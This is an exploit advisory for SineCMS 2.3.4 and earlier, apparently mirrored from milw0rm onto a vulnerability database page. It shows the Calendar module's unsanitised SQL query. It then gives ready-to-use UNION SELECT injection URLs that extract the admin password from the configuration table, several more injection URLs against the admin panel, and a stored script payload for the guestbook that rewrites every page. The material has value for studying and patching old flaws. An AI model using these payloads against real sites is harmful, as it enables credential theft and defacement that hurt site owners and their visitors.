Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
seebugRootSSV:65023
HistoryJul 01, 2014 - 12:00 a.m.

SineCMS <= 2.3.4 Calendar Remote SQL Injection Vulnerability

2014-07-0100:00:00
Root
www.seebug.org
12
JSON

No description provided by source.


                                                ---------------------------------------------------------------
 ____            __________         __             ____  __   
/_   | ____     |__\_____  \  _____/  |_          /_   |/  |_ 
 |   |/    \    |  | _(__  &#60;_/ ___\   __\  ______  |   \   __\
 |   |   |  \   |  |/       \  \___|  |   /_____/  |   ||  |  
 |___|___|  /\__|  /______  /\___  &#62;__|            |___||__|  
          \/\______|      \/     \/                         
---------------------------------------------------------------

Http://www.inj3ct-it.org 	     Staff[at]inj3ct-it[dot]org 

---------------------------------------------------------------

SineCMS &#60;= 2.3.4 Calendar SQL Injection &#39;n something else..

---------------------------------------------------------------

#By KiNgOfThEwOrLd				

---------------------------------------------------------------
Notes:

Only with magic_quotes_gpc -&#62; Off
---------------------------------------------------------------
Corrupted file: 

mods/Calendar/index.php
---------------------------------------------------------------
Corrupted code:

[...]
function Evento ($sine){
	if (!isset($_GET[id]) OR $_GET[id]==&#34;&#34;) {
	header(&#34;Location: index.php&#34;);
	}
	$query = &#34;SELECT * FROM &#34;.$sine[db][prefisso_tab].&#34;calendario WHERE id=&#39;$_GET
[id]&#39;&#34;;
	if ($_GET[id]){
		$result = mysql_query($query, $sine[db][db]);
		$row = mysql_fetch_array($result);
[...]
---------------------------------------------------------------
Exploit:

http://[target]/[sinecms_path]/mods.php?
mods=Calendar&action=info&id=&#39;+union+select+1,password,3,4,5,6,7,8,9
+from+sine_configuration/*
---------------------------------------------------------------
Something else..

There are a lots of useless sql injection in the admin panel, like...

http://[target]/[sinecms_path]/admin/mods_adm.php?
mods=Guestbook&action=modifica&id=&#39;+union+select+1,2,3,4,password,
6+from+sine_configuration/*

http://[target]/[sinecms_path]/admin/mods_adm.php?
mods=Calendar&mese=11&#39;+union+select+1,password,3,4,5,6,7,8,9
+from+sine_configuration/*

http://[target]/[sinecms_path]/admin/mods_adm.php?
mods=Calendar&action=modify&id=&#39;+union+select+1,2,3,4,password,6,7,8,9
+from+sine_configuration/*

http://[target]/[sinecms_path]/admin/mods_adm.php?
mods=Calendar&anno=&#39;+union+select+1,password,3,4,5,6,7,8,9
+from+sine_configuration/*

and much more..
---------------------------------------------------------------
There is also a permanent html injection in the guestbook, and i belive it can 
be considered so dangerous, coz the &#34;last comments&#34; module it&#39;s included in all 
the pages...then, an attacker can rewrite alle the pages posting a comment like

&#60;script&#62;document.body.innerHTML=&#34;[Arbitrary_Code]&#34;;&#60;/script&#62;

in the &#34;username&#34; or &#34;comment&#34; field.
---------------------------------------------------------------

# milw0rm.com [2007-12-05]
JSON